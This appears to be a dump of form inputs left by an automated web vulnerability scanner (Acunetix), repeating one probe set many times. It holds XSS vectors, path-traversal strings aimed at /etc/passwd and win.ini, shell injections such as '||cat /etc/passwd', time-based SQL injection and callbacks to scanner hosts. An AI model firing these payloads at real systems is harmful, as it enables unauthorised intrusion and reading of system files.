${100401+100347}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<body onload=prompt(999006)>

1

1

-1))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(951309)>

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1MKKSfOY'

1

1&n916774=v997313

1<img src=xyz OnErRor=prompt(936884)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1

r2eiUcNi')

1

1<img/src=">" onerror=alert(909979)>

1

/etc/passwd

'"()

'

1

es8PkFEw'))

!(()&&!|*|*|

testasp.vulnweb.com

1<ScRiPt%20>prompt(902461)</sCripT>

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

1&lt

1

'

^(#$!@#$)(()))******

1

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

"

1

\xf6<img acu onmouseover=prompt(976049) //\xf6>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

&dir

1

1<input autofocus onfocus=prompt(912054)>

1

${@print(md5(acunetix_wvs_security_test))}

1

'&dir&'

1

yLxkAujd'

acunetix_wvs_invalid_filename

http://hitJwReeIhWlL.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

<a href='http://www.acunetix.com'>website security</a>

1

1

file:///etc/passwd

comments

hG2e8PF5')

"&dir&"

1

1

[url=http://www.acunetix.com]website security[/url]

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

|dir

1

X9QtuK0F'))

comments

/\../\../\../\../\../\../\../etc/passwd

1_I3T2K <ScRiPt >prompt(985015)</ScRiPt>

1

1

1

1

comments/.

1

'|dir

1

'"

1'"()&%<ScRiPt >prompt(954443)</ScRiPt>

WEB-INF/web.xml

1

1

"|dir

1

1

<!--

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(994803)</ScRiPt>

1

1

1

1

../../../../../../../../../../windows/win.ini

1_954050

1

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acu1334\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1334

1

1

acux9049\xc0\xbez1\xc0\xbcz2a\x90bcxuca9049

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(965372)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<script>prompt(945360)</script>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(910023)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958772></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(949397)</ScRiPt>

WEB-INF/web.xml

1

1

response.write(9695895*9831830)

1<video><source onerror="javascript:prompt(997757)">

1

WEB-INF\web.xml

1

'+response.write(9695895*9831830)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901275)"></g></svg>

&cat /etc/passwd&

"+response.write(9695895*9831830)+"

1

1<div style=width:expression(prompt(982486))>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

'&cat /etc/passwd&'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1<body onload=prompt(902429)>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd.jpg

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942476)>

${99124+100431}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1<img src=xyz OnErRor=prompt(984735)>

1&n911560=v905221

1

`cat /etc/passwd`

-1

)

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img/src=">" onerror=alert(921407)>

-1)

1

|cat /etc/passwd#

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt%20>prompt(936050)</sCripT>

-1))

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'|'ld

1

^(#$!@#$)(()))******

ZRTFvozU'

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

'

1

MtdMDzWm')

"|"ld

1

1

1

\xf6<img acu onmouseover=prompt(913580) //\xf6>

"

1

/etc/passwd

1

scjP9Zec'))

1

1

${@print(md5(acunetix_wvs_security_test))}

-1

http://hitB3OAf4j5UL.bxss.me/

1<input autofocus onfocus=prompt(924186)>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

<a href='http://www.acunetix.com'>website security</a>

-1)

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

comments

1_sUWWn <ScRiPt >prompt(994630)</ScRiPt>

1

1

||cat /etc/passwd

1

http://www.acunetix.tst

1

1

comments/.

FQqcSi3D'

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(953811)</ScRiPt>

&dir

'"

1

Blttuder')

1

1

1

1

Nzk6V3KK'))

<!--

'&dir&'

'"()&%<ScRiPt >prompt(976928)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

WEB-INF/web.xml

"&dir&"

1_927195

1

1

1

|dir

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

'|dir

1

1

../../../../../../../../../../boot.ini

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

acu6598\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6598

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

acux9280\xc0\xbez1\xc0\xbcz2a\x90bcxuca9280

1

1<ScRiPt >prompt(956525)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<script>prompt(953684)</script>

1

response.write(9770196*9868091)

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(999955)</ScRiPt>

'+response.write(9770196*9868091)+'

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903597></ScRiPt>

1

"+response.write(9770196*9868091)+"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(902002)</ScRiPt>

&cat /etc/passwd&

1

1

1

1<video><source onerror="javascript:prompt(910187)">

1

1

1

1

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989893)"></g></svg>

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1<div style=width:expression(prompt(948332))>

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

${99826+99475}

1<iframe src='data:text/html

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<body onload=prompt(960896)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990981)>

1

1

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1&n968418=v913075

../../../../../../../../../../etc/passwd.jpg

-1)

1<img src=xyz OnErRor=prompt(906968)>

1

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

-1))

1<img/src=">" onerror=alert(989409)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

)

"|"ld

1

testasp.vulnweb.com

rQGckAqj'

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(952529)</sCripT>

'"()

1

1

SPcNWNT8')

1

^(#$!@#$)(()))******

1&lt

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

1

1

1

'

1

xi95XvgQ'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

1

1

\xf6<img acu onmouseover=prompt(903210) //\xf6>

-1

"

1

1

1

1<input autofocus onfocus=prompt(946739)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

-1)

<a href='http://www.acunetix.com'>website security</a>

1

1

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

http://hitjEpNyQxZz4.bxss.me/

&dir

1

1

1

PJqeBxdw'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1_Eev8K <ScRiPt >prompt(907125)</ScRiPt>

acunetix_wvs_invalid_filename

1

'&dir&'

D7dbSnaD')

1

1

'"

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://www.acunetix.tst

1

comments

1

1

kqUkG8Ku'))

"&dir&"

<!--

1

1

1

comments/.

1'"()&%<ScRiPt >prompt(948430)</ScRiPt>

1

1

1

1

1

|dir

file:///etc/passwd

'"()&%<ScRiPt >prompt(983144)</ScRiPt>

1

1

'|dir

1

1

1_977571

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu8215\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8215

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux9155\xc0\xbez1\xc0\xbcz2a\x90bcxuca9155

1

................windowswin.ini

1

1<ScRiPt >prompt(909426)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(932705)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(940072)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9521183*9493038)

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?930534></ScRiPt>

1

1

1

'+response.write(9521183*9493038)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(928004)</ScRiPt>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9521183*9493038)+"

../../../../../../../../../../etc/passwd

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(972737)">

1

1

'&cat /etc/passwd&'

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908281)"></g></svg>

WEB-INF\web.xml

1

"&cat /etc/passwd&"

1

1

1

1

1<div style=width:expression(prompt(980001))>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

${99668+99285}

cat /etc/passwd

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<iframe src='data:text/html

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n975067=v926246

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

`cat /etc/passwd`

1

1

1<body onload=prompt(930685)>

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983413)>

'|'ld

'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

"

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

1

testasp.vulnweb.com

"|"ld

1

1<img src=xyz OnErRor=prompt(912655)>

${@print(md5(acunetix_wvs_security_test))}

1

/etc/passwd

1

KMx7Fz97'

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1<img/src=">" onerror=alert(905514)>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

QMIvjxWM')

1

1

1

'

1

1<ScRiPt%20>prompt(999901)</sCripT>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

HTmSF5hI'))

acunetix_wvs_invalid_filename

1&lt

http://hitkJoUW2tMKk.bxss.me/

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

comments

1

1

\xf6<img acu onmouseover=prompt(975887) //\xf6>

||cat /etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

1<input autofocus onfocus=prompt(975509)>

1

1

comments

1

http://www.acunetix.tst

-1))

1

&dir

<a href='http://www.acunetix.com'>website security</a>

1'"()&%<ScRiPt >prompt(958061)</ScRiPt>

comments/.

'"

1

'&dir&'

1

[url=http://www.acunetix.com]website security[/url]

file:///etc/passwd

hGBNzpyT'

1

<!--

1

1

'"()&%<ScRiPt >prompt(940752)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

uFWD61pY')

1_GFABk <ScRiPt >prompt(953620)</ScRiPt>

"&dir&"

1

1

9e3ZetfL'))

1_913621

1

WEB-INF/web.xml

1

|dir

1

1

WEB-INF\web.xml

1

1

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu1880\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1880

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

acux10709\xc0\xbez1\xc0\xbcz2a\x90bcxuca10709

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(956171)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(953498)</script>

1

1

1

1<ScRiPt >prompt(961737)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?923594></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(927349)</ScRiPt>

1

1<video><source onerror="javascript:prompt(967245)">

1

1

1

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988696)"></g></svg>

WEB-INF\web.xml

1

1

1

1<div style=width:expression(prompt(959199))>

1

1

1

1

1

1<iframe src='data:text/html

1

1<body onload=prompt(912840)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(949016)>

1

1

1<img src=xyz OnErRor=prompt(953595)>

1

1

1<img/src=">" onerror=alert(914592)>

1

1

1<ScRiPt%20>prompt(954708)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(988960) //\xf6>

1

1<input autofocus onfocus=prompt(993546)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1_zRF1P <ScRiPt >prompt(940770)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9991497*9626026)

1

1

'+response.write(9991497*9626026)+'

&cat /etc/passwd&

"+response.write(9991497*9626026)+"

1

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

${99458+99225}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

`cat /etc/passwd`

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1&n937896=v979223

-1

|cat /etc/passwd#

1

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

^(#$!@#$)(()))******

'|'ld

-1)

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

"|"ld

-1))

1

1

1

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

hvHNq8vq'

1

http://hitHOukYlGnU1.bxss.me/

acunetix_wvs_invalid_filename

"

1

/etc/passwd

'

1

r2j7uNK9')

1

comments

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

comments

fs0uTRWy'))

"

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments/.

1

1

-1

||cat /etc/passwd

http://www.acunetix.tst

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'"

1

1'"()&%<ScRiPt >prompt(978356)</ScRiPt>

&dir

-1)

'"()&%<ScRiPt >prompt(919417)</ScRiPt>

1

1

<!--

'&dir&'

-1))

1_927959

1

1

1

1

"&dir&"

gW77pjhU'

file:///etc/passwd

1

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

yIph9XvA')

1

VSW4hPhN'))

WEB-INF/web.xml

acu10805\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10805

'|dir

1

acux10644\xc0\xbez1\xc0\xbcz2a\x90bcxuca10644

WEB-INF\web.xml

"|dir

1<ScRiPt >prompt(978128)</ScRiPt>

1

1<script>prompt(975422)</script>

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(948213)</ScRiPt>

../../../../../../../../../../boot.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977625></ScRiPt>

1

1<ScRiPt >prompt(932969)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1<video><source onerror="javascript:prompt(962597)">

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(965808)"></g></svg>

1

1

................windowswin.ini

1<div style=width:expression(prompt(973507))>

response.write(9293211*9639885)

1

1

'+response.write(9293211*9639885)+'

..\..\..\..\..\..\..\..\windows\win.ini

1<iframe src='data:text/html

1

1

1

&cat /etc/passwd&

"+response.write(9293211*9639885)+"

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<body onload=prompt(969097)>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(902120)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<img src=xyz OnErRor=prompt(980169)>

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

${99919+100289}

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<img/src=">" onerror=alert(949497)>

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

WEB-INF/web.xml

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<ScRiPt%20>prompt(982989)</sCripT>

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1&n911570=v965841

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

|cat /etc/passwd#

)

1&lt

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

\xf6<img acu onmouseover=prompt(967380) //\xf6>

'|'ld

-1))

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

DZNEXnma'

1

1<input autofocus onfocus=prompt(953509)>

'"()

/etc/passwd

testasp.vulnweb.com

1

'

1

1

1

noSnUD1W')

<a href='http://www.acunetix.com'>website security</a>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

'

LDHaKL0V'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

1_y9caW <ScRiPt >prompt(993491)</ScRiPt>

"

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1)

||cat /etc/passwd

1

1

1

http://hitevVmkljAGD.bxss.me/

1

1

-1))

acunetix_wvs_invalid_filename

1

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

SXU0u7UO'

'&dir&'

file:///etc/passwd

1

comments

'"

AA6wvYmn')

http://www.acunetix.tst

1

1

1

comments

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

<!--

dhXTDoCh'))

1

comments/.

1'"()&%<ScRiPt >prompt(923779)</ScRiPt>

|dir

1

1

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(966277)</ScRiPt>

1

1

'|dir

WEB-INF\web.xml

1

"|dir

1

1

1_998854

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

1

acu8075\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8075

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

acux1570\xc0\xbez1\xc0\xbcz2a\x90bcxuca1570

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(942920)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<script>prompt(954356)</script>

1

1

1

response.write(9963392*9089753)

1<ScRiPt >prompt(908994)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976711></ScRiPt>

1

'+response.write(9963392*9089753)+'

1

1

1<ScRiPt >prompt(996291)</ScRiPt>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9963392*9089753)+"

1

1

1<video><source onerror="javascript:prompt(909443)">

1

1

'&cat /etc/passwd&'

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984769)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

WEB-INF\web.xml

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(910596))>

1

1

cat /etc/passwd

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<iframe src='data:text/html

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

1

${99421+99921}

